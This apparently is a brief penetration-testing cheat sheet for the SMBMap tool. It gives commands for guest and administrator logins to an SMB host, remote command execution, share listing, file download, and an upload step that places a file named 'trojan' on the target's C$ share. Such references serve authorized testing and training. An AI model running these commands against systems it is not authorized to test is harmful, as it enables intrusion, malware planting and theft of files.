SMBMap
Basic sintax
Section titled “Basic sintax”smbmap -u guest -p "" -d . -H $IP
smbmap -u administrator -p "$password_123" -d . -H $IPRemote commands
Section titled “Remote commands”Run any command
Section titled “Run any command”smbmap -H $IP -u administrator -p "$password_123" -x 'ipconfig'Read SMB volume
Section titled “Read SMB volume”smbmap -H $IP -u administrator -p "$password_123" -r 'C$'Upload file
Section titled “Upload file”smbmap -H $IP -u administrator -p "$password_123" --upload '/tmp/trojan' 'C$\trojan'Download file
Section titled “Download file”smbmap -H $IP -u administrator -p "$password_123" --download 'C$\download_file.txt'